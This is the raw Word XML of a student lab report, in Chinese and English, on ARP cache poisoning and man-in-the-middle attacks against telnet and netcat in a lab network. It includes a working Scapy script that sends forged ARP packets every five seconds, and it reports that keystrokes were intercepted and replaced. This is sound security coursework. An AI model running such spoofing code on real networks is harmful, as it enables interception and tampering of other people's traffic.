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A097A" w14:textId="6824EF95" w:rsidR="00001B6F" w:rsidRDefault="00001B6F" w:rsidP="00001B6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001B6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>实验报告4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C081D37" w14:textId="4BA2B14A" w:rsidR="00001B6F" w:rsidRPr="00001B6F" w:rsidRDefault="00001B6F" w:rsidP="00001B6F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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>7118139</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>顾宸玮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE73743" w14:textId="396D3752" w:rsidR="00935BF1" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>Task 1: ARP Cache Poisoning</w:t>
      </w:r>
      <w:r w:rsidR="00F672A7" w:rsidRPr="00F672A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF020BA" w14:textId="7E650604" w:rsidR="00001B6F" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Task 1.A (using ARP request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408E7479" w14:textId="77777777" w:rsidR="00001B6F" w:rsidRDefault="00F229BC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A772EB" wp14:editId="5FB1D7DD">
            <wp:extent cx="5274310" cy="1204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06AF" w14:textId="7B4FA4AB" w:rsidR="00001B6F" w:rsidRDefault="00001B6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行如上代码后，发现1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机的ARP缓存里有1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址为攻击者M的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，发现攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05438373" w14:textId="5AFA7F07" w:rsidR="00825493" w:rsidRDefault="00F229BC">
      <w:r w:rsidRPr="00F229BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A9698F0" wp14:editId="797F207D">
            <wp:extent cx="5274310" cy="826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F50D" w14:textId="5B1FE8FC" w:rsidR="00476044" w:rsidRDefault="00476044"/>
    <w:p w14:paraId="7239EFA6" w14:textId="387ED4C8" w:rsidR="00476044" w:rsidRDefault="00001B6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Task 1.B (using ARP reply)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB6EEC" w14:textId="7C3EAAE2" w:rsidR="00476044" w:rsidRDefault="008442A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45CC7550" wp14:editId="63F04BF0">
            <wp:extent cx="5274310" cy="1663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2B04" w14:textId="77777777" w:rsidR="00001B6F" w:rsidRDefault="00001B6F" w:rsidP="00001B6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scenario 1: B’s IP is already in A’s cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E8FD3" w14:textId="2EB10D4E" w:rsidR="00001B6F" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B已在A中时攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF78B2" w14:textId="59583B02" w:rsidR="00F40320" w:rsidRDefault="008442A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451F80ED" wp14:editId="76FD17F9">
            <wp:extent cx="5274310" cy="732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51E" w14:textId="1BB0622E" w:rsidR="00001B6F" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scenario 2: B’s IP is not in A’s cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B33136" w14:textId="416FDAB2" w:rsidR="00001B6F" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>可以发现当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>中时，也可以攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3191D5" w14:textId="6E8572D1" w:rsidR="00761F1D" w:rsidRDefault="009A77C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1092B22A" wp14:editId="2B2BE8D1">
            <wp:extent cx="5274310" cy="12807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B451" w14:textId="3EF76084" w:rsidR="00761F1D" w:rsidRDefault="00761F1D"/>
    <w:p w14:paraId="333E80AB" w14:textId="7FDAFC5B" w:rsidR="00761F1D" w:rsidRDefault="00761F1D"/>
    <w:p w14:paraId="0F101FE7" w14:textId="62B94FE9" w:rsidR="00761F1D" w:rsidRDefault="00001B6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Task 1C (using ARP gratuitous message).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D72DB" w14:textId="2452E96B" w:rsidR="00BC0683" w:rsidRDefault="00BC0683"/>
    <w:p w14:paraId="521C0F8A" w14:textId="08F4949C" w:rsidR="00761F1D" w:rsidRDefault="009A77C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374C578E" wp14:editId="3D751287">
            <wp:extent cx="5274310" cy="16554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B82B" w14:textId="77777777" w:rsidR="00001B6F" w:rsidRDefault="00001B6F" w:rsidP="00001B6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scenario 1: B’s IP is already in A’s cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7141D019" w14:textId="0546BB76" w:rsidR="00001B6F" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现B已在A中时攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A9C0A" w14:textId="5D860A87" w:rsidR="00162DA9" w:rsidRDefault="009A77C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F6D5ED" wp14:editId="54617AE1">
            <wp:extent cx="5274310" cy="1399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7D05" w14:textId="77777777" w:rsidR="00001B6F" w:rsidRDefault="00001B6F" w:rsidP="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scenario 2: B’s IP is not in A’s cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4ED320" w14:textId="68425A53" w:rsidR="00001B6F" w:rsidRPr="00001B6F" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>可以发现当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>中时，也可以攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD33C1B" w14:textId="6F36B4E3" w:rsidR="009A77C3" w:rsidRDefault="009A77C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C66AC4" wp14:editId="7E591894">
            <wp:extent cx="5274310" cy="862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2305" w14:textId="75AE48DC" w:rsidR="00162DA9" w:rsidRDefault="00162DA9"/>
    <w:p w14:paraId="3A2E1C27" w14:textId="15FAE44E" w:rsidR="00162DA9" w:rsidRDefault="00162DA9"/>
    <w:p w14:paraId="55153989" w14:textId="2A4D1543" w:rsidR="00162DA9" w:rsidRDefault="00162DA9"/>
    <w:p w14:paraId="6A3572AB" w14:textId="1F7D0754" w:rsidR="00162DA9" w:rsidRDefault="00162DA9"/>
    <w:p w14:paraId="1A8EE900" w14:textId="778D636A" w:rsidR="00162DA9" w:rsidRDefault="00162DA9"/>
    <w:p w14:paraId="7F8DFBBF" w14:textId="6C6006BD" w:rsidR="00162DA9" w:rsidRDefault="00162DA9"/>
    <w:p w14:paraId="7C8E9259" w14:textId="3AE35582" w:rsidR="006E60C4" w:rsidRDefault="00001B6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>Task 2: MITM Attack on Telnet using ARP Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD2AE6" w14:textId="71184CF3" w:rsidR="006E60C4" w:rsidRDefault="00001B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码如下，每隔5s伪造一次报文使得A</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址为M的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA816DA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>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81A56E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>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB426BA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>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103EAF80" w14:textId="77777777" w:rsidR="009A77C3" w:rsidRPr="00001B6F" w:rsidRDefault="009A77C3" w:rsidP="009A77C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDF73C7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>def AB():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A696E90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E=Ether(src='02:42:0a:09:00:69',dst='ff:ff:ff:ff:ff:ff')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C358E9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A=ARP(op=1,psrc='10.9.0.6',hwsrc='02:42:0a:09:00:69',pdst='10.9.0.5')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636D13D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pkt=E/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005EEE5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sendp(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAAA9F2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>def BA():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54469230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E=Ether(src='02:42:0a:09:00:69',dst='ff:ff:ff:ff:ff:ff')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32631D25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A=ARP(op=1,psrc='10.9.0.5',hwsrc='02:42:0a:09:00:69',pdst='10.9.0.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61E8E3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pkt=E/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A301B25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sendp(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E0346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>while(1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D209468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AB()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA3CE9" w14:textId="77777777" w:rsidR="009A77C3" w:rsidRPr="00001B6F" w:rsidRDefault="009A77C3" w:rsidP="009A77C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001B6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>BA()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1649A8FE" w14:textId="62ADE6F0" w:rsidR="006E60C4" w:rsidRDefault="009A77C3" w:rsidP="009A77C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001B6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>time.sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44816792" w14:textId="5DB245DA" w:rsidR="00FD54F1" w:rsidRPr="00FD54F1" w:rsidRDefault="00FD54F1" w:rsidP="009A77C3">
      <w:r w:rsidRPr="00FD54F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805B75F" w14:textId="1B2E9C7B" w:rsidR="006E60C4" w:rsidRDefault="009A77C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4647F658" wp14:editId="76A84224">
            <wp:extent cx="5274310" cy="915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DDD1" w14:textId="23C55B28" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当M的I</w:t>
      </w:r>
      <w:r>
        <w:t>P_F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orward=</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，发现A</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双方可以连通</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4536B90A" w14:textId="6546D469" w:rsidR="00525669" w:rsidRDefault="009A77C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5366E208" wp14:editId="115828EC">
            <wp:extent cx="5274310" cy="13328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B9E7" w14:textId="6364A777" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当M的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>P_F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orward=</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，发现A</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双方开始丢包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDCA1B" w14:textId="0B3DE838" w:rsidR="00525669" w:rsidRDefault="009A77C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61025F5E" wp14:editId="508682D3">
            <wp:extent cx="5274310" cy="11182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1732" w14:textId="228C6CD7" w:rsidR="00525669" w:rsidRDefault="00525669"/>
    <w:p w14:paraId="003839CB" w14:textId="73719928" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1"/>
    <w:p w14:paraId="680D8C33" w14:textId="6AC88213" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1"/>
    <w:p w14:paraId="29331547" w14:textId="27C420BB" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1"/>
    <w:p w14:paraId="2A287AE7" w14:textId="42AB0906" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将A中的所有包的内容都换成字母“Z”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C67BF2" w14:textId="3685FC54" w:rsidR="00A972F6" w:rsidRDefault="00FD54F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A7EEE4C" wp14:editId="07C819A4">
            <wp:extent cx="5274310" cy="17151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F17D" w14:textId="52A798C6" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现，A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>telnet到B后，在A中键入的所有值都成“Z”，如第一第二幅图中最后的data“5a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5a 5a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，即“Z</w:t>
      </w:r>
      <w:r>
        <w:t>ZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，而实际键入的是三个方向键，但是可以发现B返回给A的包并没有被修改内容，如最右边的图，最后的data是“1</w:t>
      </w:r>
      <w:r>
        <w:t>b 5b 41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。可以发现攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E59E32" w14:textId="3C4077D1" w:rsidR="00A972F6" w:rsidRDefault="00E42C2B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104155FC" wp14:editId="47612ECA">
            <wp:extent cx="5274310" cy="16497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A170" w14:textId="23BBC080" w:rsidR="00E42C2B" w:rsidRDefault="00E42C2B"/>
    <w:p w14:paraId="4A55DE8A" w14:textId="66ADE0EE" w:rsidR="0010558D" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>Task 3: MITM Attack on Netcat using ARP Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B09C4" w14:textId="59FBD24A" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将我的名字“chenwei”换成字母“</w:t>
      </w:r>
      <w:r>
        <w:t>ZZZZZZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”,可以发现，在</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中键入的“chenwei”在B中都被换成“Z</w:t>
      </w:r>
      <w:r>
        <w:t>ZZZZZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4493A7" w14:textId="796A78BC" w:rsidR="0010558D" w:rsidRDefault="0010558D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04A6B91D" wp14:editId="6A58642C">
            <wp:extent cx="5274310" cy="15081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2D3" w14:textId="35C701A2" w:rsidR="0010558D" w:rsidRDefault="0010558D"/>
    <w:p w14:paraId="2E967A8C" w14:textId="0D17EF92" w:rsidR="0010558D" w:rsidRDefault="0010558D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4E77EC" wp14:editId="03F085B5">
            <wp:extent cx="5274310" cy="9715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8A71" w14:textId="2CBF42E4" w:rsidR="0010558D" w:rsidRDefault="0010558D"/>
    <w:p w14:paraId="4075EEC8" w14:textId="07565337" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1"/>
    <w:p w14:paraId="15C30F51" w14:textId="772F61F3" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1"/>
    <w:p w14:paraId="6FCDAB13" w14:textId="0A37A313" w:rsidR="00FD54F1" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD54F1">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
